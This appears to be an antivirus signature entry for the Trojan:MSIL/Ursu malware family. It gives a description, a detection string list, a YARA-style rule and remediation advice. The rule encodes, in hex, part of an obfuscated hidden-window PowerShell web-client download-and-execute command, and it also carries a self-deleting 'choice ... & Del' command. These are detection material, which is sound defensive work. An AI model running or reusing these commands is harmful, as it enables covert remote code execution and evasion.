Concrete signature match: Trojan - Appears legitimate but performs malicious actions for .NET (Microsoft Intermediate Language) platform, family Ursu
Trojan:MSIL/Ursu is a sophisticated .NET-based malware that employs various Windows legitimate binaries (LOLBINs) like PowerShell, mshta, rundll32, and regsvr32 for stealthy execution, persistence, and API hooking. It establishes command-and-control (C2) communication to download or execute further malicious payloads, leveraging scheduled tasks and BITS jobs for sustained presence, and includes self-deletion capabilities.
Relevant strings associated with this threat: - ijS (SNID) - 8_9j/5SrIHRTVKaaxOt7oi0PZ/O1H5zK (PEHSTR_EXT) - m4/u_YT0wH1Kwy8LoT (PEHSTR_EXT) - vshcso.txe ek-n tevssc (PEHSTR_EXT) - Service-0x0-3e7$\default (PEHSTR_EXT) - AcSvcst.dll (PEHSTR_EXT) - SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs (PEHSTR_EXT) - Final2.dll (PEHSTR_EXT) - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT) - rundll32 (PEHSTR_EXT) - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT) - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT) - !#HSTR:ExecutionGuardrails (PEHSTR_EXT) - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT) - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
rule Trojan_MSIL_UrsuPow_AA_2147743060_0
{
meta:
author = "threatcheck.sh"
detection_name = "Trojan:MSIL/UrsuPow.AA"
threat_id = "2147743060"
type = "Trojan"
platform = "MSIL: .NET intermediate language scripts"
family = "UrsuPow"
severity = "Critical"
signature_type = "SIGNATURE_TYPE_PEHSTR"
threshold = "2"
strings_accuracy = "High"
strings:
$x_1_1 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 20 00 2d 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 74 00 79 00 6c 00 65 00 20 00 68 00 69 00 64 00 64 00 65 00 6e 00 20 00 2d 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 22 00 26 00 7b 00 24 00 74 00 3d 00 27 00 23 00 23 00 69 00 65 00 78 00 23 00 40 00 28 00 6e 00 65 00 77 00 23 00 2d 00 23 00 6f 00 62 00 23 00 6a 00 65 00 63 00 23 00 74 00 20 00 4e 00 23 00 23 00 65 00 74 00 23 00 2e 00 57 00 23 00 65 00 62 00 23 00 43 00 6c 00 23 00 69 00 65 00 23 00 6e 00 74 00 23 00 29 00 2e 00 23 00 55 00 70 00 23 00 6c 00 6f 00 61 00 23 00 64 00 23 00 53 00 74 00 23 00 72 00 69 00 23 00 6e 00 67 00 28 00 23 00 27 00 27 00 68 00 23 00 74 00 23 00 74 00 70} //weight: 1, accuracy: High
$x_1_2 = "choice /C Y /N /D Y /T 3 & Del" wide //weight: 1
condition:
(filesize < 20MB) and
(all of ($x*))
}a252554acce04f9e83eaca3827a649fe1922195437e12ec439b9a078bf89be45331a5609b90c1187e31b47a321c8f954640cf2179c8b9edf17066a1ef4902798Immediately isolate the affected system, perform a comprehensive antimalware scan, remove all detected malicious components, and meticulously check for and dismantle persistence mechanisms (e.g., scheduled tasks, registry modifications, services). Review network logs for C2 activity, strengthen system security configurations, and apply all necessary security patches.